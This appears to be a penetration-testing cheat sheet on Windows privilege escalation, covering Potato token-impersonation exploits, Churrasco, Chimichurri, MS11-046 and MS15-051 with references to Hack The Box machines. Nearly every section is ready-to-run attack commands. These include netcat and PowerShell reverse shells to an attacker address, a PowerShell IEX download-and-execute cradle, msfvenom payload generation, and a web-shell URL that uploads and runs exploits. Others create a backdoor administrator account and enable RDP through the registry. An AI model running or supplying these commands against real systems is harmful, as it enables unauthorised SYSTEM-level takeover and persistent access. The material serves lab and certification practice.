# 4 Kernel Exploits
| Family | | Versions |
| ------------- | --------------------- | --------------------------------------------------------------------------------------------------- |
| Rogue Potato | Latest Version | SHOULD work on Windows 10 |
| Juicy Potato | Upgrade of Rotten | Server 2008 R2 - No Hotfixes
Windows 7 Enterprise 6.1.7600
Patched in Latest Win-10
|
| Rotten Potato | Old | Year: 2016 |
| Churrasco | Non-Potato | |
| Chimichurri | Non-Potato : MS10-059 | |
## Basics
*
* [GitlabPotatoesWindowsPrivEsc](https://jlajara.gitlab.io/others/2020/11/22/Potatoes_Windows_Privesc.html)
## Required for Potato:
```
> whoami
Local Service
> whoami /priv
SeImpersonatePrivilege ..Enabled
```
## Token Impersonations
Service Accounts\
Cant login with them, but can escalate them
## Rogue Potato
*
* (compiled)
*
```
> RoguePotato.exe -r 10.x.x.x -l 9999 -e "C:\PrivEsc\reverse.exe"
> nc -nvlp 9999
```
## Juicy Potato \*\*BEST\*\*
* Token Impersonation
*
* [http://ohpe.it/juicy-potato/CLSID](http://ohpe.it/juicy-potato/CLSID/) (or powershell script)
*
```
whoami /priv ..SeImpersonatePrivilege = JuicyPotato
JuicyPotato.exe -l 5555 -p C:\PrivEsc\reverse.exe -t * -c GUID_CLSID
Juicy.Potato.x86.exe -l 5555 -p "C:\inetpub\wwwroot\shell.exe" -t * -c {F087771F-D74F-4C1A-BB8A-E16ACA9124EA}
JuicyPotato.exe -l 5555 -p c:\Windows\system32\cmd.exe -a "/c C:\intepub\drupal-7.54\nc.exe -e cmd.exe 10.x.x.x 4555" -t *
JuicyPotato.exe -l 5555 -p c:\Windows\system32\cmd.exe -a "/c C:\intepub\drupal-7.54\nc.exe -e cmd.exe 10.x.x.x 4555" -t * -c {9B1F122C-2982-4e91-AA8B-E071D54F2A4D}
nc -nvlp 5555
whoami ..system
```
## Juicy Potato + Powershell
* Reverse Shell with Admin
* JP will use Elevated Powershell to grab/exe reverse-ps1-shell
*
* REF: ArcticHTB
```
> cp /opt/JuicyPotato.exe jp.exe
> cp /opt/nishang/Shells/Invoke-PowerShellTcp.ps1 revshell.ps1
> vim revshell.ps1
Add this to the end of the file:
Invoke-PowerShellTcp -Reverse -IPAddress $IP -Port 7600
> sudo impacket-smbserver kali .
> copy \\10.10.14.34\kali\jp.exe .
> jp.exe -t * -p C:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -l 9001 -a "-c IEX(new-object net.webclient).downloadstring('http://$IP:9090/revshell.ps1')" -c {9B1F122C-2982-4e91-AA8B-E071D54F2A4D}
> nc -lvnp 7600
> whoami ..system!!
```
## Rotten Potato
Exploit from 2016\
Service Accounts could get System tickets and Impersonate
## churrasco
* REF: GrannyHTB GrandpaHTB
*
* Token impersonation via churrasco
* To escalate privs to System - developed by Cesar Cerrudo.
* Server 2003 allows Network Service and Local Service to impersonate 'System'
* Patched by Microsoft in Windows 2012 (MS09-12).
* On newer systems Juicy Potato works fine.
* But on older systems, token impersonation is abused via the churrasco exploit.
* If you have access to a box as `nt authority\network service`
* IE: You managed to upload ASP.NET shell
* You can easily elevate your privileges on the box.
* You can download the exploit [**here**](https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/6705.zip) and compile by yourself
* or you can use the one from `sqlninja` which is located at `/usr/share/sqlninja/apps/churrasco.exe`
* It’s used by `sqlninja` in cases when we bruteforced `sa` password.
* After uploading you can easily
* Elevate your privileges.
* Create an Admin account
```
------------------------
Share from Kali/smb:
locate churrasco.exe
wget https://github.com/Re4son/Churrasco/raw/master/churrasco.exe
cp /usr/share/sqlninja/apps/churrasco.exe /tmp
cp /usr/share/sqlninja/apps/nc.exe /tmp
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.98 RPORT=5555 -f exe > /tmp/venomshell.exe
locate smbserver.py
cd /usr/share/doc/python3-impacket/examples/
sudo python3 smbserver.py share /tmp
nc -nvlp 5555
------------------------
Windows:
whoami /priv ..SeImpersonatePrivilege - Yes!
systeminfo ..Server 2003 - Yes!
cd C:\Windows\Temp
copy \\10.x.x.x\share\nc.exe .
copy \\10.x.x.x\share\venomshell.exe .
copy \\10.x.x.x\share\churrasco.exe .
> \\10.x.x.x\share\churrasco.exe -d whoami
> churrasco -d "net user /add "
> churrasco -d "net localgroup administrators /add"
> churrasco -d "net localgroup "Remote Desktop Users" /add"
> churrasco.bin "net user oscp oscp /add && net localgroup Administrators oscp /add"
> churrasco -d "'reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server' /v fDenyTSConnections /t REG_DWORD /d 0 /f"
linux> rdesktop -u oscp -p oscp 10.x.x.x
> churrasco.exe -d venomshell.exe
> churrasco.exe -d "C:\Windows\Temp\nc.exe 10.x.x.x 5555 -e cmd.exe"
> \\10.x.x.x\share\churrasco.exe -d "C:\Windows\Temp\nc.exe 10.x.x.x 5555 -e cmd.exe"
```
## chimichurri
* MS10-059
* Found with [WindowsExploitSuggester](https://pentest.mxhx.org/win-enum#windows-exploit-suggester)
* Server 2008 R2 Datacenter 6.1.7600 N/A Build 7600 No Patch 64bit
* github/Re4son ..other blog:
```
cd /opt
git clone https://github.com/egre55/windows-kernel-exploits
cd windows-kernel-exploits/MS10–059: Chimichurri/Compiled
cp Chimichurri.exe .
pythom -m SimpleHTTPServer 4444
cd C:\ColdFusion8\ or:
cd C:\Windows\Temp
echo $webclient = New-Object System.Net.WebClient >wget.ps1
echo $url = "http://$MyIP:4444/Chimichurri.exe" >>wget.ps1
echo $file = "Chimichurri.exe" >>wget.ps1
echo $webclient.DownloadFile($url,$file) >>wget.ps1
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInterative -NoProfile -File wget.ps1
Chimichurri.exe 10.10.14.xx 5555
nc -nvlp 5555
connected ..system!!
----------
or:
cd /usr/share/doc/python3-impacket/examples
sudo python3 ./smbserver.py share /tmp
nc -nvlp 5555
cd C:\Windows\Temp\
copy \\$MyIP\share\Chimichurri.exe .
Chimichurri.exe $MyIP 5555
system!!
----------
chimichurri.exe $MyIP 5555
nc -nvlp 5555
system!
```
## MS11-046 (AFD PrivEsc)
* The Ancillary Function Driver (AFD) in afd.sys does not properly validate user-mode input which allows local users to elevate privileges.
* ms11-046.exe 6.1.7600 Build 7600 - for 32bit only
*
```
https://github.com/abatchy17/WindowsExploits
https://github.com/abatchy17/WindowsExploits/blob/5e9c25cda54fe33fb6e1fd3ae60512a1113b41df/MS11-046/MS11-046.exe
smbserver.py share
\\10.10.14.34\share\MS11-046.exe
whoami ..system!
https://github.com/rasta-mouse/Watson
or
Download from:
https://www.exploit-db.com/exploits/40564
Compile:
apt install mingw-w64 ..if not installed
i686-w64-mingw32-gcc 40564.c -o 40564.exe -lws2_32
python -m SimpleHTTPServer 8080
wget and curl are not installed on the machine however powershell is.
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.x.x.x:8080/40564.exe', 'c:\Users\Public\Downloads\40564.exe')"
whoami ..system!
```
## MS15-051
* REF: [DrupalPhpVuln](https://pentest.mxhx.org/04-webapps/drupal#serialization-vulnerability-41564-php)
```
MS15-051 privesc
github/hfiref0x ..compiled Taihou64.exe (firefox thought virus)
github/SecWiki ..MS15-051 ..compiled ..zipped ..download
cp ms15-051x64.exe .
http://10.x.x.x/ippsec.php?fupload=ms15-051x64.exe&fexec=ms15-051x64.exe whoami
system!
http://10.x.x.x/ippsec.php?fupload=ms15-051x64.exe&fexec=ms15-051x64.exe "nc64.exe -e 10.x.x.x 5555"
nc -nvlp 5555
system!
Bonus PrivEsc:
ms15–051x64.exe whoami ..easy
```
## Send and Execute
* Execute files from UNC shares
* Ex: [DrupalPhpVuln](https://pentest.mxhx.org/04-webapps/drupal#serialization-vulnerability-41564-php)
```
impacket-smbserver share `myfolder`
http://10.x.x.x/ippsec.php?fexe=\\10.x.x.x\share\privesc.exe whoami
```